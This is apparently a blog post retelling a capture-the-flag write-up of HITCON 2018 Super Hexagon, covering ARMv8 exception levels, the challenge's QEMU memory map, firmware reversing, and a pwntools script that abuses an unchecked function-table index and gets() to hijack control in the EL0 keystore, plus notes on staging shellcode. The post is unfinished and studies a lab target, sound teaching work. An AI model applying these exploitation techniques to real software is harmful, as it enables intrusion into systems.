This post is an educational rewrite of Grant Hernandez’s excellent write-up of HITCON18 CTF Super Hexagon [1].

I will try to detail every step along the way and look for alternative solutions to the challenges, to further educate myself in ARM/AArch64 kernel exploitation.

Download Super Hexagon challenge


Introduction

ARMv8 execution states

In October 2011 [2], ARM announced a fundamental change to the ARM architecture: the ARMv8-A profile (often simply called ARMv8, although an ARMv8-R profile also exists). ARMv8-A broadened the ARM architecture to embrace 64-bit processing and extended virtual addressing to 64 bits.

The ARMv8 architecture consists of two main execution states, AArch64 (also referred to as arm64 [3]) and AArch32 (arm32). The AArch64 execution state introduces a new instruction set, A64, for 64-bit processing. The AArch32 state supports the existing ARM instruction set.

From the programmer’s perspective, the main differences between AArch64 and AArch32 are that all A64 instructions are a fixed 32 bits wide, with the 16-bit Thumb model completely removed, and that AArch64 has 31 general-purpose registers, each 64 bits wide, instead of 16 [4].

From the systems programmer’s perspective, the privilege model has been simplified to Exception Levels (EL). There are four numbered exception levels, from least to most privileged: EL0, EL1, EL2, and EL3 [5].

  • EL0 is the User mode for unprivileged execution.
  • EL1 is the Supervisor (kernel) mode and associated functions that are typically described as privileged.
  • EL2 is the Hypervisor mode.
  • EL3 is the trusted firmware or secure monitor.

Depending on the system configuration or platform, these may differ slightly, but for the Super Hexagon challenge, they are standard.

Each exception level, except EL2, has a Secure or Non-Secure mode. This is the basis of ARM TrustZone and has been for over a decade. A single processor core can only execute in one mode at a time. ELs and secure versus non-secure modes are changed through exceptions. These can occur asynchronously, usually as interrupts from a peripheral or timer, or synchronously from an instruction trap.

These traps are caused by the instructions:

  • svc: Supervisor Call causes an exception to EL1. It provides a mechanism for unprivileged software to make a system call to an operating system. See C6.2.294 in the ARMv8 reference manual [6].
  • hvc: Hypervisor Call causes an exception to EL2. Non-secure software executing at EL1 can use this instruction to call the hypervisor to request a service. HVC is UNDEFINED if the processor is in Secure state, or in User mode in Non-secure state. See C6.2.85 in the ARMv8 reference manual [6].
  • smc: Secure Monitor Call causes an exception to EL3. SMC is available only for software executing at EL1 or higher. It is UNDEFINED in EL0. See C6.2.227 in the ARMv8 reference manual [6].
Figure 1: ARMv8-A exception level security model summarised. © Grant Hernandez [1]
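
The rules for the three trap instructions can be condensed into a small lookup. The sketch below is a simplified model of the list above, not of the full architecture: the names TRAPS and target_el are made up for illustration, and it ignores the configuration bits that can disable or reroute these instructions.

```python
# Simplified model of the three trap instructions described above.
# TRAPS and target_el are illustrative names, not part of any real API.
TRAPS = {
    # instruction: (target EL, lowest EL allowed to execute it)
    "svc": (1, 0),
    "hvc": (2, 1),
    "smc": (3, 1),
}


def target_el(instr, current_el, secure=False):
    """Return the EL that handles `instr`, or None if it is UNDEFINED here."""
    target, min_el = TRAPS[instr]
    if current_el < min_el:
        return None  # hvc and smc are UNDEFINED at EL0
    if instr == "hvc" and secure:
        return None  # hvc is UNDEFINED in Secure state
    # An exception is never taken to a lower level than the current one.
    return max(target, current_el)


print(target_el("svc", 0))  # 1
print(target_el("hvc", 1))  # 2
print(target_el("smc", 0))  # None
```

For Super Hexagon this mirrors the path of the challenge: user code reaches the kernel with svc, the kernel reaches the hypervisor with hvc, and the secure monitor is reached with smc.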

Exception handling

When an exception occurs, the processor must execute handler code which corresponds to the exception. The location in memory where the handler is stored is called the exception vector. In the ARM architecture, exception vectors are stored in a table, called the exception vector table. Each Exception Level has its own vector table, that is, there is one for each of EL3, EL2 and EL1. The table contains instructions to be executed, rather than a set of addresses. Vectors for individual exceptions are located at fixed offsets from the beginning of the table.

The virtual address of each table base is set by the Vector Base Address Registers VBAR_EL3, VBAR_EL2 and VBAR_EL1. VBAR_ELn is a system register, so it cannot be accessed like a general-purpose register or memory; the system instructions msr (write) and mrs (read) must be used to manipulate system registers.

The exception handlers reside in contiguous memory, and each vector is up to 32 instructions (0x80 bytes) long. Depending on the type of the exception, execution starts at a particular offset from the base address in VBAR_EL1. Below is the AArch64 vector table. For example, when a synchronous exception is taken from EL0 running AArch64, the handler at VBAR_EL1 + 0x400 executes to handle the exception.

Linux defines the vector table at arch/arm64/kernel/entry.S and loads the vector table into VBAR_EL1 in arch/arm64/kernel/head.S.

Offset from VBAR_EL1   Exception type    Exception taken from
+0x000                 Synchronous       Current EL with SP0
+0x080                 IRQ/vIRQ
+0x100                 FIQ/vFIQ
+0x180                 SError/vSError
+0x200                 Synchronous       Current EL with SPx
+0x280                 IRQ/vIRQ
+0x300                 FIQ/vFIQ
+0x380                 SError/vSError
+0x400                 Synchronous       Lower EL using AArch64
+0x480                 IRQ/vIRQ
+0x500                 FIQ/vFIQ
+0x580                 SError/vSError
+0x600                 Synchronous       Lower EL using AArch32
+0x680                 IRQ/vIRQ
+0x700                 FIQ/vFIQ
+0x780                 SError/vSError
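
The layout of the table is regular enough to compute. The following is a minimal sketch of that arithmetic; vector_offset and the string labels are hypothetical names chosen for this example, and the only inputs are the slot size and the row order from the table.

```python
# Each vector slot holds up to 32 instructions of 4 bytes: 32 * 4 = 0x80 bytes.
SLOT_SIZE = 32 * 4

# Row order within a group and group order within the table, as listed above.
KINDS = ["sync", "irq", "fiq", "serror"]
SOURCES = ["current_sp0", "current_spx", "lower_a64", "lower_a32"]


def vector_offset(source, kind):
    """Offset of a handler from VBAR_ELn (hypothetical helper)."""
    slot = SOURCES.index(source) * len(KINDS) + KINDS.index(kind)
    return slot * SLOT_SIZE


# A synchronous exception (for example svc) taken from AArch64 EL0 into EL1:
print(hex(vector_offset("lower_a64", "sync")))    # 0x400
print(hex(vector_offset("lower_a32", "serror")))  # 0x780
```

The whole table is 16 slots of 0x80 bytes, or 0x800 bytes in total.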

QEMU runtime emulation

QEMU can be used in different modes of operation:

  1. User mode only where system calls are emulated by QEMU and no kernel is required.
  2. Kernel mode where a guest architecture kernel is required, but QEMU provides the initial BIOS setup routine.
  3. BIOS mode where the first instruction executed is up to the developer. Used in the Super Hexagon challenge.

By viewing the qemu.patch file, we understand the physical memory map definition of bios.bin.

35	+#define RAMLIMIT_GB 3
36	+#define RAMLIMIT_BYTES (RAMLIMIT_GB * 1024ULL * 1024 * 1024)
37	+static const MemMapEntry memmap[] = {
38	+    /* Space up to 0x8000000 is reserved for a boot ROM */
39	+    [VIRT_FLASH] =              {          0, 0x08000000 },
40	+    [VIRT_CPUPERIPHS] =         { 0x08000000, 0x00020000 },
41	+    [VIRT_UART] =               { 0x09000000, 0x00001000 },
42	+    [VIRT_SECURE_MEM] =         { 0x0e000000, 0x01000000 },
43	+    [VIRT_MEM] =                { 0x40000000, RAMLIMIT_BYTES },
44	+};
  BOOT ROM (FLASH)    0x00000000 - 0x07FFFFFF
  PERIPHERALS         0x08000000 - 0x0801FFFF
  UART                0x09000000 - 0x09000FFF
  SECURE MEMORY       0x0E000000 - 0x0EFFFFFF
  NON-SECURE MEMORY   0x40000000 - 0xFFFFFFFF
Figure 2: The bios.bin file physical memory map visualized.

The emulated “hitcon” machine requires 3 GB of memory. The boot ROM flash, at physical address 0x0 with size 0x08000000, is split into two halves (see lines 172 and 173 below). The first half is mapped into the secure address space and is backed by the BIOS image; the second half is mapped into the non-secure address space.

167	+    // prepare ram / rom
168	+    MemoryRegion *ram = g_new(MemoryRegion, 1);
169	+    memory_region_allocate_system_memory(ram, NULL, "mach-hitcon.ram", machine->ram_size);
170	+    memory_region_add_subregion(sysmem, memmap[VIRT_MEM].base, ram);
171	+
172	+    hwaddr flashsize = memmap[VIRT_FLASH].size / 2;
173	+    hwaddr flashbase = memmap[VIRT_FLASH].base;
174	+    create_one_flash("hitcon.flash0", flashbase, flashsize, bios_name, secure_sysmem);
175	+    create_one_flash("hitcon.flash1", flashbase + flashsize, flashsize, NULL, sysmem);
176	+
177	+    MemoryRegion *secram = g_new(MemoryRegion, 1);
178	+    hwaddr base = memmap[VIRT_SECURE_MEM].base;
179	+    hwaddr size = memmap[VIRT_SECURE_MEM].size;
180	+    memory_region_init_ram(secram, NULL, "hitcon.secure-ram", size, &error_fatal);
181	+    memory_region_add_subregion(secure_sysmem, base, secram);
...
192	+    bootinfo.loader_start = memmap[VIRT_MEM].base;
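
The numbers in the patch can be checked with a few lines of arithmetic. This is only a sketch that copies the base and size pairs from memmap[] above; MEMMAP and last_address are names invented for the example.

```python
GIB = 1024 ** 3

# (base, size) pairs copied from the memmap[] table in qemu.patch.
MEMMAP = {
    "VIRT_FLASH": (0x00000000, 0x08000000),
    "VIRT_CPUPERIPHS": (0x08000000, 0x00020000),
    "VIRT_UART": (0x09000000, 0x00001000),
    "VIRT_SECURE_MEM": (0x0E000000, 0x01000000),
    "VIRT_MEM": (0x40000000, 3 * GIB),
}


def last_address(name):
    """Highest address that belongs to a region (hypothetical helper)."""
    base, size = MEMMAP[name]
    return base + size - 1


# The flash region is split in half, as on lines 172 to 175 of the patch.
flash_base, flash_size = MEMMAP["VIRT_FLASH"]
half = flash_size // 2
flash0 = (flash_base, half)         # hitcon.flash0: secure, holds bios.bin
flash1 = (flash_base + half, half)  # hitcon.flash1: non-secure, empty

print(hex(flash1[0]))                 # 0x4000000
print(hex(last_address("VIRT_MEM")))  # 0xffffffff
```

With 3 GB of RAM starting at 0x40000000, non-secure memory ends exactly at the top of the 32-bit physical address range.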

The machine starts at TBC

When executing qemu, the user is prompted with a trusted keystore application.

NOTICE:  UART console initialized
INFO:    MMU: Mapping 0 - 0x2844 (783)
INFO:    MMU: Mapping 0xe000000 - 0xe204000 (40000000000703)
INFO:    MMU: Mapping 0x9000000 - 0x9001000 (40000000000703)
NOTICE:  MMU enabled
NOTICE:  BL1: HIT-BOOT v1.0
INFO:    BL1: RAM 0xe000000 - 0xe204000
INFO:      SCTLR_EL3: 30c5083b
INFO:      SCR_EL3:   00000738
INFO:    Entry point address = 0x40100000
INFO:    SPSR = 0x3c9
VERBOSE: Argument #0 = 0x0
VERBOSE: Argument #1 = 0x0
VERBOSE: Argument #2 = 0x0
VERBOSE: Argument #3 = 0x0
NOTICE:  UART console initialized
[VMM] RO_IPA: 00000000-0000c000
[VMM] RW_IPA: 0000c000-0003c000
[KERNEL] mmu enabled
INFO:      TEE PC: e400000
INFO:      TEE SPSR: 1d3
NOTICE:  TEE OS initialized
[KERNEL] Starting user program ...

=== Trusted Keystore ===

Command:
    0 - Load key
    1 - Save key

cmd> 1
index: 0
key: AAAAAAAAAAAAAAAAAAAAAAAAAAA
[0] <= AAAAAAAAAAAAAAAAAAAAAAAAAAA
cmd> 0
index:
[0] => aaaaaaaaaaaaaaaaaaaaaaaaaa
cmd>

EL0

Let’s begin reversing the bios.bin file, starting with a classic binwalk.

$ binwalk -e bios.bin

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
143472        0x23070         SHA256 hash constants, little endian
770064        0xBC010         ELF, 64-bit LSB executable, version 1 (SYSV)
792178        0xC1672         Unix path: /lib/libc/aarch64
792711        0xC1887         Unix path: /lib/libc/aarch64
794111        0xC1DFF         Unix path: /lib/libc/aarch64
796256        0xC2660         Unix path: /home/seanwu/hitcon-ctf-2018

The file contains an AArch64 ELF executable with DWARF debug information.

$ file _bios.bin.extracted/BC010.elf
BC010.elf: ELF 64-bit LSB executable, ARM aarch64, version 1 (SYSV), statically linked, not stripped

When decompiling the BC010.elf main() function using Ghidra, it is clear that it contains the Trusted Keystore application.

int main(void) {
  int iVar1;

  intro();
  load_trustlet("HITCON",0x750);
  cmdtb[0] = cmd_load;
  cmdtb[1] = cmd_save;
  buf = (char *)mmap((void *)0x0,0x1000,3,0,0,-1);
  iVar1 = 0;
  while (iVar1 < 10) {
    run();
    iVar1 = iVar1 + 1;
  }
  return 0;
}

void run(void) {
  size_t sVar1;
  int len;
  int idx;
  int cmd;

  printf("cmd> ");
  scanf("%d",&cmd);
  printf("index: ");
  scanf("%d",&idx);
  if (cmd == 1) {
    printf("key: ");
    scanf("%s",buf);
    sVar1 = strlen(buf);
    len = (int)sVar1;
  }
  else {
    len = 0;
  }
  (*cmdtb[(longlong)cmd])(buf,idx,len); // <-- Owned by attacker
  return;
}

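Here cmd, idx, len and the contents of buf are controlled by the attacker. Because cmd is never bounds-checked, cmdtb[cmd] can be made to read a function pointer from outside the global cmdtb array (allocated at 0x00412750), which gives the attacker control over the program counter.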

//
// .bss
// SHT_NOBITS  [0x412650 - 0x412777]
// ram: 00412650-00412777
//
__bss_start__                                   XREF[5]:     Entry Point(*), 00400088(*),
__bss_start                                                  scanf:0040197c(*),
_edata                                                       scanf:0040199c(*),
input                                                        _elfSectionHeaders::000000d0(*)  
00412650                 char[256]                                                   main.c:13
cmdtb[1]                                        XREF[3,1]:   Entry Point(*), run:0040057c(R),
cmdtb                                                        main:00400600(W),
                                                             main:0040060c(W)  
00412750                 void cmd                                                    main.c:14
tci_handle                                      XREF[4]:     Entry Point(*),
                                                             load_trustlet:004001e4(W),
                                                             load_key:00400320(R),
                                                             save_key:0040048c(R)  
00412760                 uint       ??                                               main.c:24
00412764                 ??         ??
00412765                 ??         ??
00412766                 ??         ??
00412767                 ??         ??
buf                                             XREF[5]:     Entry Point(*), run:00400588(R),
                                                             run:004005ac(R), run:004005bc(R),
                                                             main:00400630(W)  
00412768                 char *     NaP                                              main.c:15
tci_buf                                         XREF[10]:    Entry Point(*),
                                                             load_trustlet:004001dc(W),
                                                             load_key:00400308(R),
                                                             load_key:00400314(R),
                                                             load_key:00400328(R),
                                                             load_key:00400378(R),
                                                             save_key:00400424(R),
                                                             save_key:00400430(R),
                                                             save_key:00400438(R),
                                                             save_key:00400498(R)  
00412770                 TCI *      NaP                                              main.c:23

Where the input char[256] buffer is allocated at 0x00412650. The input buffer is used in the customized scanf().

int scanf(char *fmt,...) {
  int iVar1;
  ...
  gets(input);
  ...
  iVar1 = vsscanf(input,fmt,(__va_list *)&local_100);
  return iVar1;
}

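Notice the usage of the insecure function gets(). Every line read by scanf() lands in input first, and input sits 0x100 bytes below cmdtb. Sending cmd = -32 therefore makes cmdtb[cmd] read its function pointer from the first 8 bytes of input, and the next line (the answer to the index prompt) overwrites those bytes with the address of print_flag: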

#!/usr/bin/env python3
from pwn import *

context.arch = 'aarch64'  # requires `aarch64-linux-gnu-as`

print_flag = p64(0x400104)  # ulonglong print_flag(void)


def do_EL0(p):
    # cmd = -32: cmdtb[-32] lies 32 * 8 bytes below `cmdtb`, at the start of `input`
    p.sendline(b'-32')
    # Answer the index prompt with the raw pointer; gets() stores it at the start of `input`
    p.sendline(print_flag)
    # Skip the first 8 bytes of the reply (prompt text) before printing the flag line
    print(p.recvline()[8:].decode())


if __name__ == "__main__":
    p = remote('localhost', 6666)

    p.recvuntil(b'cmd>')
    print("[+] Got banner")

    do_EL0(p)

Result:

$ ./el0.py
[+] Opening connection to localhost on port 6666: Done
[+] Got banner
Flag (EL0): hitcon{this is flag 1 for EL0}

[*] Closed connection to localhost port 6666
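
The index -32 used in the script is not arbitrary. It follows from the two .bss addresses in the Ghidra listing, as the sketch below works out; the constant names are chosen for this example, and struct.pack is used only to show what pwntools' p64() produces.

```python
import struct

INPUT_ADDR = 0x412650  # char input[256], from the .bss listing
CMDTB_ADDR = 0x412750  # cmdtb[], from the .bss listing
PRINT_FLAG = 0x400104  # print_flag(), as used in the exploit script
POINTER_SIZE = 8       # AArch64 function pointers are 8 bytes wide

# cmdtb[cmd] reads from CMDTB_ADDR + cmd * 8; solve for the start of input.
index = (INPUT_ADDR - CMDTB_ADDR) // POINTER_SIZE
print(index)  # -32

# The 8 little-endian bytes placed at the start of input (same as p64()).
payload = struct.pack("<Q", PRINT_FLAG)

# gets() stops at a newline, so the pointer must not contain one.
assert b"\n" not in payload
```

Any other function address without a 0x0a byte could be called the same way, which is what makes this primitive useful beyond printing the first flag.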

Now it is necessary to achieve arbitrary code execution.

The memory-mapped page behind the global buf is the target for our shellcode. However, it is mapped with PROT_READ | PROT_WRITE = 3, without PROT_EXEC. To get the address returned by the mmap() call for buf, I put a breakpoint at 0x40062c and read the x0 register.

syscall   x8    x0             x1             x2               x3           x4        x5
exit      0x5d  int __status
write     0x40  int __fd       void *__buf    size_t __nbytes
read      0x3f  int __fd       void *__buf    size_t __nbytes
mmap      0xde  void *__addr   size_t __len   int __prot       int __flags  int __fd  __off_t __offset
mprotect  0xe2  void *__addr   size_t __len   int __prot

gef➤  b *0x40062c
gef➤  c
Continuing.

Breakpoint 2, 0x000000000040062c in main () at bl33/user/main.c:149
149	in bl33/user/main.c
[ Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$x0  : 0x00007ffeffffd000  →  0x0000000000000000  →  0x0000000000000000

The buf is always allocated at 0x00007ffeffffd000 due to the lack of ASLR. To change the memory protection of buf, mprotect() may be called.

When calling mprotect() with prot = RWX, the virtual machine throws an error: ‘ERROR: [VMM] RWX pages are not allowed’.
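
The error message suggests a W^X style policy: a page may not be writable and executable at the same time. The sketch below models that policy and the register setup for an mprotect() call. vmm_allows is a guess at the check based only on the error text, and mprotect_registers is a hypothetical helper; whether the hypervisor accepts a read and execute mapping is not confirmed here.

```python
# Linux protection flags (values from <sys/mman.h>).
PROT_READ, PROT_WRITE, PROT_EXEC = 1, 2, 4

# Syscall number from the table above.
SYS_MPROTECT = 0xE2

BUF = 0x00007FFEFFFFD000  # address returned by mmap(), read from x0 in gdb


def vmm_allows(prot):
    """Assumed model of the VMM check: reject writable + executable pages."""
    return not (prot & PROT_WRITE and prot & PROT_EXEC)


def mprotect_registers(addr, length, prot):
    """Register values for an mprotect() syscall, following the table above."""
    return {"x8": SYS_MPROTECT, "x0": addr, "x1": length, "x2": prot}


print(vmm_allows(PROT_READ | PROT_WRITE))              # True  (prot = 3, as in main())
print(vmm_allows(PROT_READ | PROT_WRITE | PROT_EXEC))  # False (prot = 7, rejected)
print(vmm_allows(PROT_READ | PROT_EXEC))               # True under this model

regs = mprotect_registers(BUF, 0x1000, PROT_READ | PROT_EXEC)
```

If the model holds, one option worth testing is to write the shellcode while the page is read and write, and only then switch it to read and execute.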

EL1

Reversing the entry point (address 0x0) of bios.bin yields the pseudocode below. It shows the EL3 monitor setup, followed by the copying of four memory segments to different destination addresses.

00000008    SCTLR_EL3(0x30c50830)   (System Control Register (EL3))
00000014    VBAR_EL3(0x2000)        (Vector Base Address Register (EL3))
00000028    SCTLR_EL3(0x30c5183a)   (System Control Register (EL3))
00000034    SCR_EL3(0x238)          (Secure Configuration Register)
00000040    MDCR_EL3(0x18000)       (Monitor Debug Configuration Register (EL3))
0000004C    CPTR_EL3(0x0)           (Architectural Feature Trap Register (EL3))
# char *memclr (char *str1, int count)
00000058    memclr(0xe002000, 0x202000)
# char *memcpy (char *dest, char *src, int count)
00000068    memcpy(0xe000000, 0x2850, 0x68)
00000078    memcpy(0x40100000, 0x10000, 0x10000)
00000088    memcpy(0xe400000, 0x20000, 0x90000)
00000098    memcpy(0x40000000, 0xb0000, 0x10000)

The memory segments copied by memcpy() are extracted with the following script. The hexadecimal offsets go through shell arithmetic so that the script also works with GNU dd, which reads 0x2850 as 0 multiplied by 2850.

#!/bin/bash

# Convert hex to decimal with $((...)) before handing the values to dd.
dd if=bios.bin of=_mem_0x2850  bs=1 skip=$((0x2850))  count=$((0x68))
dd if=bios.bin of=_el2_0x10000 bs=1 skip=$((0x10000)) count=$((0x10000)) # 64 KiB
dd if=bios.bin of=_mem_0x20000 bs=1 skip=$((0x20000)) count=$((0x90000)) # 576 KiB
dd if=bios.bin of=_el1_0xb0000 bs=1 skip=$((0xb0000)) count=$((0x10000)) # 64 KiB

  1. Offset 0x2850 does not disassemble to aarch64 instructions.
  2. Offset 0x10000 disassembles and appears to be the EL2 kernel.
  3. Offset 0x20000 does not disassemble to aarch64 instructions.
  4. Offset 0xB0000 disassembles and appears to be the EL1 kernel.

00010000         adr        x0, #0x11800  ; DATA XREF=EntryPoint+112, EntryPoint+116, EntryPoint+148
00010004         msr        vbar_el2, x0
00010008         isb
0001000c         ldr        x0, =0x40105000
00010010         ldr        x1, =0xd000
00010014         bl         sub_10858+8
00010018         msr        spsel, #0x0
0001001c         ldr        x0, =0x40104040
00010020         mov        sp, x0
00010024         bl         sub_282c+55332

000b0000         adr        x0, #0xb1000 ; DATA XREF=EntryPoint+144, qword_110, sub_b8930+20
000b0004         msr        ttbr0_el1, x0
000b0008         adr        x0, #0xb4000
000b000c         msr        ttbr1_el1, x0
000b0010         movz       x0, #0x10
000b0014         movk       x0, #0x8010, lsl #16
000b0018         movk       x0, #0x60, lsl #32
000b001c         msr        tcr_el1, x0
000b0020         isb
000b0024         mrs        x0, sctlr_el1
000b0028         orr        x0, x0, #0x1
000b002c         msr        sctlr_el1, x0
000b0030         isb
000b0034         orr        x0, xzr, #0xffffffffc0000000 <-- EL1 base address
000b0038         adr        x1, #0xb8000
000b003c         add        x0, x0, x1
000b0040         br         x0

By reversing the BIOS setup process and stepping through it with the following commands, I can conclude that the EL1 virtual base address is 0xffffffffc0000000 and the entry point is 0xffffffffc0008000. Given that information, I import the _el1_0xb0000 file into the Hopper disassembler.

$ gdb-multiarch _bios.bin.extracted/BC010.elf
gef➤  set arch aarch64
The target architecture is assumed to be aarch64
gef➤  target remote localhost:1234
Remote debugging using localhost:1234

Stepping through the process to address 0xffffffffc0008004 gives VBAR_EL1(0xffffffffc000a000).
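
The addresses in this section follow from simple arithmetic on the disassembly. In the sketch below, LOAD_ADDR = 0 is an assumption: it is suggested by the boot log line "[VMM] RO_IPA: 00000000-0000c000", which hints that EL1 sees its image starting at address 0, but it is not verified here. The constant names are chosen for this example.

```python
MASK64 = (1 << 64) - 1

EL1_BASE = 0xFFFFFFFFC0000000  # constant loaded by the orr at 0xb0034
FILE_BASE = 0xB0000            # offset of the EL1 segment inside bios.bin
ADR_TARGET = 0xB8000           # target of `adr x1` as shown by the disassembler
LOAD_ADDR = 0x0                # ASSUMPTION: EL1 sees the segment at address 0

# adr is PC-relative, so at run time x1 = load address + offset in segment.
x1 = LOAD_ADDR + (ADR_TARGET - FILE_BASE)
entry = (EL1_BASE + x1) & MASK64
print(hex(entry))  # 0xffffffffc0008000

VBAR_EL1 = 0xFFFFFFFFC000A000  # value observed in gdb
SYNC_LOWER_A64 = 0x400         # offset from the vector table
print(hex(VBAR_EL1 + SYNC_LOWER_A64))  # 0xffffffffc000a400
```

The second address is where an svc issued by the EL0 program enters the kernel, so it is a natural place to start reversing the syscall dispatcher.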

if (x8 == 0x40) {
  local_x20_160 = 0;
  while (_return_value = x0, local_x20_160 < x0) {
    do_write((uint)*(byte *)(local_x20_160 + x1));
    local_x20_160 = local_x20_160 + 1;
  }
}

References
  1. https://hernan.de/blog/2018/10/30/super-hexagon-a-journey-from-el0-to-s-el3 

  2. https://web.archive.org/web/20111122083000/https://www.arm.com/about/newsroom/arm-discloses-technical-details-of-the-next-version-of-the-arm-architecture.php 

  3. https://www.phoronix.com/scan.php?page=news_item&px=MTY5ODk 

  4. https://static.docs.arm.com/100878/0100/fundamentals_of_armv8_a_100878_0100_en.pdf?_ga=2.35770848.1593680955.1562538645-1678148931.1562001271 

  5. https://www.arm.com/files/downloads/ARMv8_Architecture.pdf 

  6. https://developer.arm.com/docs/ddi0487/latest/arm-architecture-reference-manual-armv8-for-armv8-a-architecture-profile